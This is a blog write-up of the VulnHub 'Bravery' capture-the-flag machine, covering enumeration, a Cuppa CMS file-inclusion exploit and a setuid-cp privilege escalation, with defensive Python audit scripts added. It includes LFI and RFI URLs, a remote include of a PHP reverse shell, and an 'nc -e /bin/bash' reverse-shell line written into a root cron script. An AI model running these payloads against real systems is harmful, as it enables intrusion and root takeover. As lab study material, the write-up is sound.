Digitalworld Bravery VulnHub Walkthrough

Note: this post was originally posted on another blog I had in June 2020, and I worked through this VulnHub machine to fix my enumeration and note-taking abilities after failing the OSCP exam the second time.


Digitalworld.local Bravery https://www.vulnhub.com/entry/digitalworldlocal-bravery,281/

This box was basically all dependent on enumeration. There’s a lot to look at and go through, but you have to keep going and searching. 95% of the time is spent getting the initial shell. I really liked this box because I got to focus on enumeration and note-taking.

Keeping a cool head, taking good notes about what was found and tried, and pushing forward was key. It isn’t a straight shot to a shell, and there’s a lot of content to go through.

Flow

  1. Run nmap
  2. Run gobuster on ports 80 and 8080
  3. Possible users discovered, and a note mentions cuppaCMS
  4. NFS share available, /var/nfsshare with user:pass for SMB
  5. Used the user:pass from NFS to get into the SMB anonymous share and secured share
  6. /genevieve/ exists, /genevieve/cuppaCMS/index.php exists
  7. Cuppa CMS vulnerability exists and works
  8. Reverse shell by RFI
  9. MySQL access is possible, creds found but lead nowhere
  10. Run a suid/sgid check, find /usr/bin/cp is suid
  11. Can overwrite maintenance.sh script to get a root reverse shell

Enumeration

Nmap – TCP Ports

nmap -sC -sV -oA nmap/tcp_all_ports -p- 10.88.42.131
Nmap scan report for 10.88.42.131
Host is up (0.00053s latency).
Not shown: 65522 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 4d:8f:bc:01:49:75:83:00:65:a9:53:a9:75:c6:57:33 (RSA)
|   256 92:f7:04:e2:09:aa:d0:d7:e6:fd:21:67:1f:bd:64:ce (ECDSA)
|_  256 fb:08:cd:e8:45:8c:1a:c1:06:1b:24:73:33:a5:e4:77 (ED25519)
53/tcp    open  domain      dnsmasq 2.76
| dns-nsid: 
|_  bind.version: dnsmasq-2.76
80/tcp    open  http        Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
|_http-title: Apache HTTP Server Test Page powered by CentOS
111/tcp   open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100003  3,4         2049/udp   nfs
|   100003  3,4         2049/udp6  nfs
|   100005  1,2,3      20048/tcp   mountd
|   100005  1,2,3      20048/tcp6  mountd
|   100005  1,2,3      20048/udp   mountd
|   100005  1,2,3      20048/udp6  mountd
|   100021  1,3,4      40222/udp   nlockmgr
|   100021  1,3,4      40701/tcp6  nlockmgr
|   100021  1,3,4      45776/tcp   nlockmgr
|   100021  1,3,4      47137/udp6  nlockmgr
|   100024  1          35505/tcp   status
|   100024  1          37004/udp   status
|   100024  1          40896/udp6  status
|   100024  1          55507/tcp6  status
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp   open  ssl/http    Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
|_http-title: Apache HTTP Server Test Page powered by CentOS
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2018-06-10T15:53:25
|_Not valid after:  2019-06-10T15:53:25
|_ssl-date: TLS randomness does not represent time
445/tcp   open  netbios-ssn Samba smbd 4.7.1 (workgroup: WORKGROUP)
2049/tcp  open  nfs_acl     3 (RPC #100227)
3306/tcp  open  mysql       MariaDB (unauthorized)
8080/tcp  open  http        nginx 1.12.2
|_http-open-proxy: Proxy might be redirecting requests
| http-robots.txt: 4 disallowed entries 
|_/cgi-bin/ /qwertyuiop.html /private /public
|_http-server-header: nginx/1.12.2
|_http-title: Welcome to Bravery! This is SPARTA!
20048/tcp open  mountd      1-3 (RPC #100005)
35505/tcp open  status      1 (RPC #100024)
45776/tcp open  nlockmgr    1-4 (RPC #100021)
MAC Address: 00:0C:29:AD:E6:EA (VMware)
Service Info: Host: BRAVERY

Host script results:
|_clock-skew: mean: 1h20m00s, deviation: 2h18m34s, median: 0s
|_nbstat: NetBIOS name: BRAVERY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.1)
|   Computer name: localhost
|   NetBIOS computer name: BRAVERY\x00
|   Domain name: \x00
|   FQDN: localhost
|_  System time: 2020-06-18T07:43:48-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-06-18T11:43:48
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.15 seconds

Nmap – UDP Top 1000 Ports

nmap -sU -sC -sV -oA nmap/udp_top_1000_ports -p 1-1000 10.88.42.131
Nmap scan report for 10.88.42.131
Host is up (0.00081s latency).
Not shown: 994 closed ports
PORT    STATE         SERVICE     VERSION
53/udp  open          domain      dnsmasq 2.76
| dns-nsid: 
|_  bind.version: dnsmasq-2.76
|_dns-recursion: Recursion appears to be enabled
68/udp  open|filtered dhcpc
111/udp open          rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100003  3,4         2049/udp   nfs
|   100003  3,4         2049/udp6  nfs
|   100005  1,2,3      20048/tcp   mountd
|   100005  1,2,3      20048/tcp6  mountd
|   100005  1,2,3      20048/udp   mountd
|   100005  1,2,3      20048/udp6  mountd
|   100021  1,3,4      40222/udp   nlockmgr
|   100021  1,3,4      40701/tcp6  nlockmgr
|   100021  1,3,4      45776/tcp   nlockmgr
|   100021  1,3,4      47137/udp6  nlockmgr
|   100024  1          35505/tcp   status
|   100024  1          37004/udp   status
|   100024  1          40896/udp6  status
|   100024  1          55507/tcp6  status
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
137/udp open          netbios-ns  Samba nmbd netbios-ns (workgroup: WORKGROUP)
138/udp open|filtered netbios-dgm
846/udp open          rpcbind     2-4 (RPC #100000)
MAC Address: 00:0C:29:AD:E6:EA (VMware)
Service Info: Host: BRAVERY

Host script results:
|_nbstat: NetBIOS name: BRAVERY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

I started UDP for 1000+ ports, but I ended up rebooting and forgot to restart it. Luckily, I didn’t need it.

Services

A lot is going on here. Obviously, the web servers stand out, but there are also SMB shares and NFS shares. Additionally, perhaps I’ll need to try a DNS zone transfer to find subdomains?

So, let’s dig in. Port 80, port 8080, SMB, and NFS.

Port 80

Gobuster

/about (Status: 200)
/1 (Status: 200)
/2 (Status: 200)
/4 (Status: 200)
/3 (Status: 200)
/contactus (Status: 200)
/5 (Status: 200)
/6 (Status: 200)
/9 (Status: 200)
/7 (Status: 200)
/0 (Status: 200)
/8 (Status: 200)
/uploads (Status: 301)

/8 Has Contents

80 and 8080 are best friends!

/about Has Contents

Visit https://www.captiongenerator.com/1075692/Try-Harder for a free hint! :-)

Nope! Not going to check that out.

/contactus Has Contents

Contact us at our hotline!

/uploads Has Contents

Possible users found from browsing the directory listings: patrick, qinyi, sara, and qiu.

/uploads/files/internal/department/procurement/sara/note.txt is the only file in there.

Remind gen to set up my cuppaCMS account.

Port 8080

/robots.txt

User-agent: *
Disallow: /cgi-bin/
Disallow: /qwertyuiop.html
Disallow: /private
Disallow: /public

/cgi-bin/

404 URL.

/qwertyuiop.html

I viewed the source and looked at the image details, but didn’t find anything. So I stored “qwertyuiop” as a possible password.

/private

403 URL.

/public

It appears to be a stubbed website. The unique thing is a mail.php that prompts for download, so there’s nothing executing PHP on the 8080 port.

Gobuster

/img (Status: 301)
/css (Status: 301)
/js (Status: 301)
/fonts (Status: 301)

Normal stuff.

/public/about

Prompts to download this file with this content.

********** ABOUT US *********

* We are a fun-loving group *
  that takes our work quite
* seriously. In our line of *
  work, we believe that the 
* most important quality of *
  our work is our effort to 
* TRY HARDER. TRYING HARDER *
  takes courage. We believe 
* we can strive for greater *
  heights, and achieve good
* things as long as we dare *
  to TRY HARDER. Are you up 
* to our challenge? I think *
  you should TRY HARDER! :) 
*                           *

*****************************

MySQL

I can’t connect from my machine; the server likely only allows connections from localhost.

ERROR 1130 (HY000): Host '10.88.42.130' is not allowed to connect to this MariaDB server

SMB

[17:34:34]🔴->1 root[ ~/VulnHub/bravery ]# smbclient -L \\\\10.88.42.131
Enter WORKGROUP\root's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        anonymous       Disk      
        secured         Disk      
        IPC$            IPC       IPC Service (Samba Server 4.7.1)
SMB1 disabled -- no workgroup available
[17:34:42]🔥root[ ~/VulnHub/bravery ]# 

Unfortunately, I couldn’t access those shares without a login.

NFS

[17:19:59]🔥root[ ~/VulnHub/bravery ]# showmount -e 10.88.42.131
Export list for 10.88.42.131:
/var/nfsshare *
[17:20:02]🔥root[ ~/VulnHub/bravery ]# 
...
mkdir nfsshare
mount 10.88.42.131:/var/nfsshare nfsshare

Great! I got new files; now time to explore them.

nfsshare/README.txt
nfsshare/qwertyuioplkjhgfdsazxcvbnm
nfsshare/discovery
nfsshare/password.txt
nfsshare/explore
nfsshare/enumeration
nfsshare/itinerary
# pipe find into read so filenames with spaces are handled as one path
find nfsshare -type f | while read -r file; do echo ">> $file <<"; cat "$file"; done

>> nfsshare/README.txt <<
read me first!
>> nfsshare/qwertyuioplkjhgfdsazxcvbnm <<
Sometimes, the answer you seek may be right before your very eyes.
>> nfsshare/discovery <<
Remember to LOOK AROUND YOU!
>> nfsshare/password.txt <<
Passwords should not be stored in clear-text, written in post-its or written on files on the hard disk!
>> nfsshare/explore <<
Exploration is fun!
>> nfsshare/enumeration <<
Enumeration is at the heart of a penetration test!
>> nfsshare/itinerary/david <<
David will need to fly to various cities for various conferences. Here is his schedule.

1 January 2019 (Tuesday):
New Year's Day. Spend time with family.

2 January 2019 (Wednesday): 
0900: Depart for airport.
0945: Check in at Changi Airport, Terminal 3.
1355 - 2030 hrs (FRA time): Board flight (SQ326) and land in Frankfurt.
2230: Check into hotel.

3 January 2019 (Thursday):
0800: Leave hotel.
0900 - 1700: Attend the Banking and Enterprise Conference.
1730 - 2130: Private reception with the Chancellor.
2230: Retire in hotel.

4 January 2019 (Friday):
0800: Check out from hotel.
0900: Check in at Frankfurt Main.
1305 - 1355: Board flight (LH1190) and land in Zurich.
1600 - 1900: Dinner reception
2000: Check into hotel.

5 January 2019 (Saturday):
0800: Leave hotel.
0930 - 1230: Visit University of Zurich.
1300 - 1400: Working lunch with Mr. Pandelson
1430 - 1730: Dialogue with students at the University of Zurich.
1800 - 2100: Working dinner with Mr. Robert James Miller and wife.
2200: Check into hotel.

6 January 2019 (Sunday):
0730: Leave hotel.
0800 - 1100: Give a lecture on Software Security and Design at the University of Zurich.
1130: Check in at Zurich.
1715 - 2025: Board flight (LX18) and land in Newark.
2230: Check into hotel.

7 January 2019 (Monday):
0800: Leave hotel.
0900 - 1200: Visit Goldman Sachs HQ
1230 - 1330: Working lunch with Bill de Blasio
1400 - 1700: Visit McKinsey HQ
1730 - 1830: Visit World Trade Center Memorial
2030: Return to hotel.

8 January 2019 (Tuesday):
0630: Check out from hotel.
0730: Check in at Newark.
0945 - 1715 (+1): Board flight (SQ21)

9 January 2019 (Wednesday):
1715: Land in Singapore.
1815 - 2015: Dinner with wife.
2100: Clear local emails and head to bed.

So, I have a username “david” and “qwertyuioplkjhgfdsazxcvbnm” is likely a password, too. That’s two clues to it now. I added the username and password to the growing password list.
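Flipping this around to the defender’s side: the reason I could mount that directory with no credentials at all is the `*` in the export list, which means any host may mount it. Here is an added Python check (my example, not part of the original walkthrough) that parses an /etc/exports file and flags that pattern along with two other risky options. The `showmount` output above only reveals `/var/nfsshare *`, so the option list on that sample line is assumed, and the other two entries are made up for contrast.

```python
#!/usr/bin/env python3
"""Flag NFS exports that any host on the network can mount.

Added example, not from the walkthrough. The box's `showmount -e` output
lists `/var/nfsshare *`, i.e. an export with no client restriction, which is
what let the NFS directory be mounted with no credentials at all.
"""
import re
from dataclasses import dataclass, field

# Constructed sample /etc/exports. The first path matches the walkthrough, but
# its option list is assumed (showmount only reveals the client spec); the
# other two entries are made up to show restricted exports for contrast.
SAMPLE_EXPORTS = """\
# constructed sample
/var/nfsshare *(rw,sync,no_root_squash)
/srv/backup   10.88.42.0/24(ro,sync,root_squash) \\
              admin.example.test(rw,sync)
/srv/scratch  *
"""

# client(opts) token: everything up to "(" is the client, the rest is options
_SPEC_RE = re.compile(r"^([^(]*)(?:\((.*)\))?$")


@dataclass
class Finding:
    path: str
    client: str
    issues: list = field(default_factory=list)


def parse_exports(text):
    """Yield (path, [(client, {options})]) for each entry in exports(5) format."""
    joined = text.replace("\\\n", " ")          # join backslash-continued lines
    for raw in joined.splitlines():
        line = raw.split("#", 1)[0].strip()     # drop comments and blank lines
        if not line:
            continue
        path, *clients = line.split()
        specs = []
        if not clients:
            specs.append(("*", set()))          # no client at all means every host
        for tok in clients:
            m = _SPEC_RE.match(tok)
            if not m:
                continue
            client = m.group(1) or "*"          # "(rw)" with no client also means every host
            opts = {o for o in (m.group(2) or "").split(",") if o}
            specs.append((client, opts))
        yield path, specs


def audit_exports(text):
    """Return a Finding for every client spec with a risky setting."""
    findings = []
    for path, specs in parse_exports(text):
        for client, opts in specs:
            issues = []
            if client == "*":
                issues.append("exported to any host (no client restriction)")
                if "rw" in opts:
                    issues.append("and writable by any host")
            if "no_root_squash" in opts:
                issues.append("no_root_squash: a remote root keeps uid 0 on this export")
            if "insecure" in opts:
                issues.append("insecure: accepts requests from unprivileged source ports")
            if issues:
                findings.append(Finding(path, client, issues))
    return findings


if __name__ == "__main__":
    for f in audit_exports(SAMPLE_EXPORTS):
        print(f"{f.path} -> {f.client}: " + "; ".join(f.issues))
```

Run it against a real host with `audit_exports(open("/etc/exports").read())`. The fix for the flagged entry is the usual one: replace `*` with the subnet or hosts that actually need the share, and keep the default `root_squash`.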

SMB – Revisited

anonymous Share

Now that I have some usernames and passwords, I tried out “david” and “qwertyuioplkjhgfdsazxcvbnm” first, and it worked!

mkdir -p smb/anonymous
smbclient \\\\10.88.42.131\\anonymous -Udavid
smb: \> prompt
smb: \> recurse
smb: \> mget "patrick's folder"
smb: \> mget "qiu's folder"
smb: \> mget "genevieve's folder"
smb: \> mget "david's folder"
smb: \> mget "kenny's folder"
smb: \> mget "qinyi's folder"
smb: \> mget "sara's folder"
smb: \> mget readme.txt

There’s a ton of files to filter through.

[17:47:23]🔥root[ ~/VulnHub/bravery/smb/anonymous ]# find . -type f | wc -l
461
[17:47:29]🔥root[ ~/VulnHub/bravery/smb/anonymous ]# 

After manually going through the files, most of them are empty, so I decided to use some bash to go through them.

# run from inside smb/anonymous so the paths in the list match the directory the loop reads from
find . -type f > ../filelist.txt
# print a header and the contents for non-empty files only, logging everything to one file
while read -r line; do
  if [ -s "$line" ]; then echo ">> $line <<"; cat "$line"; fi
done < ../filelist.txt | tee -a ../anonymous_nonempty_files.txt

>> ./sara's folder/gossip_corner/gossip18 <<
Qiu gives me too much work. I'm really stressed.
>> ./sara's folder/gossip_corner/gossip27 <<
Misconfigurations are the nightmare of system administrators.
>> ./sara's folder/gossip_corner/gossip5 <<
If only I could get back at the boss... she's so nasty. She controls EVERYTHING and doesn't trust me in even administering her tomcat server.
>> ./sara's folder/gossip_corner/gossip23 <<
Que sera sera, whatever will be, will be.
>> ./sara's folder/email/2048 <<
2048 is a game.

.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.

BUT...

.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.

The CTF is not just a game. It's more than a game. It's about TRYING HARDER... and making sure this machine gets rooted!

.
.
.

ALL THE BEST! TRY HARDER!
>> ./genevieve's folder/CMS/migration/important! <<
need to migrate CMS. obsolete. speak to qiu about temporarily using her IIS to test a sharepoint installation.
>> ./genevieve's folder/email/spear <<
Amidst the flurry of content are certain files that may stand out. Smart bravery will allow you to read what you want; stupid bravery is called recklessness.
>> ./patrick's folder/work!/present_for_qiu/present <<
Should I bring her to watch the "Phantom of the Opera"?

Hmmmm... but she looks so stressed recently... :-(
>> ./patrick's folder/work!/samba/david_secured_share/readme/readme.txt <<
Please DO NOT spread the password around.
>> ./kenny's folder/vuln_assessment_team/windows/XP_disclaimer <<
XP is no longer provided; please upgrade to win7 or win10 because we no longer support XP.
>> ./readme.txt <<
-- READ ME! --

This is an INTERNAL file-sharing system across SMB. While awaiting migration to Sharepoint, we are currently relying on the use of the SMB protocol to share information.

Once we migrate everything to Sharepoint, we will kill off this temporary service. This service will be re-purposes to only share UNCLASSIFIED information.

We also noticed the archival of plenty of e-mail. Please remove all of that before migration, unless you need them.

Regards
Genevieve the Brave

I didn’t see anything useful in the files, but I did add two new users: “kenny” and “genevieve.”

secured Share

[18:15:37]🔥root[ ~/VulnHub/bravery/smb/secured ]# smbclient \\\\10.88.42.131\\secured -U david
Enter WORKGROUP\david's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Sep 28 09:52:14 2018
  ..                                  D        0  Thu Jun 14 12:30:39 2018
  david.txt                           N      376  Sat Jun 16 04:36:07 2018
  genevieve.txt                       N      398  Mon Jul 23 12:51:27 2018
  README.txt                          N      323  Mon Jul 23 21:58:53 2018

                17811456 blocks of size 1024. 13166144 blocks available
smb: \> prompt
smb: \> get *
NT_STATUS_OBJECT_NAME_INVALID opening remote file \*
smb: \> mget *
getting file \david.txt of size 376 as david.txt (73.4 KiloBytes/sec) (average 73.4 KiloBytes/sec)
getting file \genevieve.txt of size 398 as genevieve.txt (97.2 KiloBytes/sec) (average 84.0 KiloBytes/sec)
getting file \README.txt of size 323 as README.txt (105.1 KiloBytes/sec) (average 89.3 KiloBytes/sec)
smb: \> 

And the file contents.

[18:16:34]🔥root[ ~/VulnHub/bravery/smb/secured ]# cat david.txt 
I have concerns over how the developers are designing their webpage. The use of "developmentsecretpage" is too long and unwieldy. We should cut short the addresses in our local domain.

1. Reminder to tell Patrick to replace "developmentsecretpage" with "devops".

2. Request the intern to adjust her Favourites to http://<developmentIPandport>/devops/directortestpagev1.php.
[18:16:37]🔥root[ ~/VulnHub/bravery/smb/secured ]# cat genevieve.txt 
Hi! This is Genevieve!

We are still trying to construct our department's IT infrastructure; it's been proving painful so far.

If you wouldn't mind, please do not subject my site (http://192.168.254.155/genevieve) to any load-test as of yet. We're trying to establish quite a few things:

a) File-share to our director.
b) Setting up our CMS.
c) Requesting for a HIDS solution to secure our host.
[18:16:48]🔥root[ ~/VulnHub/bravery/smb/secured ]# cat README.txt 
README FOR THE USE OF THE BRAVERY MACHINE:

Your use of the BRAVERY machine is subject to the following conditions:

1. You are a permanent staff in Good Tech Inc.
2. Your rank is HEAD and above.
3. You have obtained your BRAVERY badges.

For more enquiries, please log into the CMS using the correct magic word: goodtech.
[18:16:53]🔥root[ ~/VulnHub/bravery/smb/secured ]# 

So, this is awesome; now I have more web URLs that I didn’t have previously.

I tried /developmentsecretpage and /devops on port 80 and 8080, but it was 404 on both. Fortunately, /genevieve was not 404.

Port 80 – Revisited

Browsing /genevieve shows a template site, but it has a link to Cuppa CMS!

http://10.88.42.131/genevieve/cuppaCMS/index.php

cuppaCMS

I searched with searchsploit and found a possible Cuppa CMS exploit at https://www.exploit-db.com/exploits/25971. So I tried it, and it worked!

http://10.88.42.131/genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
http://10.88.42.131/genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php

Configuration.php contents. I added the password to the list.

<?php 
	class Configuration{
		public $host = "localhost";
		public $db = "bravery";
		public $user = "root";
		public $password = "r00tisawes0me";
		public $table_prefix = "cu_";
		public $administrator_template = "default";
		public $list_limit = 25;
		public $token = "OBqIPqlFWf3X";
		public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";
		public $upload_default_path = "media/uploadsFiles";
		public $maximum_file_size = "5242880";
		public $secure_login = 0;
		public $secure_login_value = "goodtech";
		public $secure_login_redirect = "doorshell.jpg";
	} 
?>

So, I decided to give the RFI a go.

mkdir www
cp /usr/share/laudanum/php/php-reverse-shell.php www/
cd www
vi php-reverse-shell.php
python3 -m http.server 80
http://10.88.42.131/genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=http://10.88.42.130/php-reverse-shell.php
http://10.88.42.131/genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=http%3A%2F%2F10%2E88%2E42%2E130%2Fphp%2Dreverse%2Dshell%2Ephp

Boom, Popped A Shell!

The RFI worked! I tried to su to david with the password I have, but it didn’t work out.
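From the blue-team side, every one of those requests lands in Apache’s access log, and the percent-encoded variant is exactly the kind of thing a naive `grep http://` misses. The Python scanner below is an added example (mine, not from the walkthrough and not Cuppa CMS code): it parses combined-format log lines, percent-decodes each query parameter, and flags the three include shapes used above (traversal, `php://` wrapper, remote URL). The log lines are constructed to mirror the requests on this page; the timestamps, sizes and user agents are made up.

```python
#!/usr/bin/env python3
"""Flag file-inclusion attempts in Apache access logs.

Added example, not part of the walkthrough or of Cuppa CMS. Each query
parameter is decoded before matching, so the percent-encoded remote URL
is caught alongside the plain forms. Log lines below are constructed.
"""
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed log lines in Apache "combined" format. Hosts and paths follow
# the walkthrough; timestamps, sizes and user agents are made up.
SAMPLE_LOG = """\
10.88.42.130 - - [18/Jun/2020:18:40:01 -0400] "GET /genevieve/cuppaCMS/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.88.42.130 - - [18/Jun/2020:18:41:07 -0400] "GET /genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd HTTP/1.1" 200 1830 "-" "Mozilla/5.0"
10.88.42.130 - - [18/Jun/2020:18:42:19 -0400] "GET /genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php HTTP/1.1" 200 1204 "-" "Mozilla/5.0"
10.88.42.130 - - [18/Jun/2020:18:45:33 -0400] "GET /genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=http%3A%2F%2F10%2E88%2E42%2E130%2Fphp%2Dreverse%2Dshell%2Ephp HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.88.42.130 - - [18/Jun/2020:18:46:00 -0400] "GET /uploads/files/internal/department/procurement/sara/note.txt HTTP/1.1" 200 41 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Each rule is (name, predicate over the fully decoded parameter value).
RULES = [
    ("path-traversal", lambda v: "../" in v or "..\\" in v),
    ("php-wrapper",    lambda v: re.match(r"(?i)^(php|data|expect|phar)://", v) is not None),
    ("remote-include", lambda v: re.match(r"(?i)^(https?|ftp)://", v) is not None),
]


def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded payloads normalise too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_line(line):
    """Return [(param, rule_name, decoded_value)] hits for one log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    query = urlsplit(m.group("target")).query
    hits = []
    # parse_qsl splits on the first "=" only, so "resource=..." stays in the value
    for param, raw in parse_qsl(query, keep_blank_values=True):
        value = decode_fully(raw)
        for name, pred in RULES:
            if pred(value):
                hits.append((param, name, value))
    return hits


def scan_log(text):
    """Return {line_number: hits} for every line that triggers at least one rule."""
    findings = {}
    for n, line in enumerate(text.splitlines(), 1):
        hits = scan_line(line)
        if hits:
            findings[n] = hits
    return findings


if __name__ == "__main__":
    for n, hits in scan_log(SAMPLE_LOG).items():
        for param, rule, value in hits:
            print(f"line {n}: {rule} via {param}={value}")
```

A 200 on the traversal and wrapper lines is the part worth alerting on; the same requests against a patched install would return an error. On the application side, the fix is the one the exploit-db entry implies: never pass a request parameter to `include`, and keep `allow_url_include` off so a remote URL cannot be included even if a bug slips through.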

MySQL – Revisited

Hoping there were passwords stored in there to pivot to “david” or “rick,” I connected using the login info from Configuration.php from earlier.

The “cu_users” table has usernames and passwords in it.

I ran the MD5 hashes through CrackStation.net.

I added the extra usernames and passwords to the list. None of the passwords were meaningful to pivot to root or another user. The only MySQL user is the root user I connected with.

Normal Linux PrivEsc

Before running LinEnum.sh, I decided to search for SUID and SGID files.

Obviously, /usr/bin/cp is not supposed to be SUID, and it stood out like a sore thumb.

From probing around before, I saw the maintenance.sh script but didn’t think much of it. It actually took me a little while to come back to it again to find I could use cp to overwrite the file.

The script is run by root (likely by a cronjob), is owned by root, and I can’t write to it.

bash-4.2$ echo -e '#!/bin/sh\nnc -e /bin/bash 10.88.42.130 9999\n' > /tmp/maintenance.sh
<h\nnc -e /bin/bash 10.88.42.130 9999\n' > /tmp/maintenance.sh               
bash-4.2$ cat /tmp/maintenance.sh
cat /tmp/maintenance.sh
#!/bin/sh
nc -e /bin/bash 10.88.42.130 9999

bash-4.2$ cp /tmp/maintenance.sh /var/www/maintenance.sh;cat /var/www/maintenance.sh
<ce.sh /var/www/maintenance.sh;cat /var/www/maintenance.sh                   
#!/bin/sh
nc -e /bin/bash 10.88.42.130 9999

bash-4.2$ 

So, I overwrote it and waited… and the root shell popped!
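Two things had to line up for that root shell: a setuid `cp` that had no business being setuid, and a root-run script for it to overwrite. The script itself was fine (root-owned, not writable), so a permissions check on the script alone would have missed this; a baseline check on setuid binaries would not. The Python below is an added example (mine, not part of the walkthrough): it builds a throwaway tree in a temp directory that mirrors the box, then runs both checks against it. The setuid baseline is an assumed, constructed list for a CentOS 7 host, not something taken from the machine.

```python
#!/usr/bin/env python3
"""Audit for the two conditions that gave up root on Bravery.

Added example, not from the walkthrough. It checks for (1) setuid/setgid
binaries that are not in an expected baseline, e.g. /usr/bin/cp, and
(2) a script run by root that a low-privilege user could replace. By default
it builds a constructed demo tree in a temp dir; point the functions at "/"
to inspect a real host.
"""
import os
import stat
import tempfile

# Constructed baseline (assumed for a CentOS 7 host). A real baseline should be
# generated from a known-good image of the same build, not typed by hand.
SUID_BASELINE = {
    "/usr/bin/passwd", "/usr/bin/su", "/usr/bin/sudo",
    "/usr/bin/mount", "/usr/bin/umount", "/usr/bin/chage",
}


def find_setuid(root):
    """Return the set of regular files under `root` carrying setuid or setgid."""
    found = set()
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: never follow symlinks here
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                found.add(path)
    return found


def unexpected_setuid(root, baseline, prefix=""):
    """Setuid files under `root` not in `baseline`; `prefix` is stripped so a
    demo tree rooted in a temp dir compares against "/"-style baseline paths."""
    return {p[len(prefix):] for p in find_setuid(root)} - baseline


def script_hijack_risks(script_path, trusted_uids=(0,)):
    """Return the reasons a root-run script could be altered by a non-root user
    (an empty list means the file and its directory look safe)."""
    issues = []
    st = os.lstat(script_path)
    if stat.S_ISLNK(st.st_mode):
        issues.append("is a symlink (target can be swapped)")
    if st.st_uid not in trusted_uids:
        issues.append(f"owned by uid {st.st_uid}, not a trusted uid")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        issues.append("writable by group or others")
    parent = os.lstat(os.path.dirname(script_path) or ".")
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        issues.append("parent directory is world-writable without the sticky bit")
    return issues


def build_demo_tree(weaken_script=False):
    """Build a constructed tree mirroring the box: setuid cp plus a root-run script.
    With weaken_script=True the script is also made group/world-writable."""
    root = tempfile.mkdtemp(prefix="bravery-audit-")
    for d in ("usr/bin", "var/www"):
        os.makedirs(os.path.join(root, d))
        os.chmod(os.path.join(root, d), 0o755)
    for rel, mode in (("usr/bin/passwd", 0o4755), ("usr/bin/cp", 0o4755), ("usr/bin/ls", 0o755)):
        path = os.path.join(root, rel)
        with open(path, "w") as f:
            f.write("#!/bin/sh\n")       # placeholder body, not the real binary
        os.chmod(path, mode)             # chmod after writing: a write would clear setuid
    script = os.path.join(root, "var/www/maintenance.sh")
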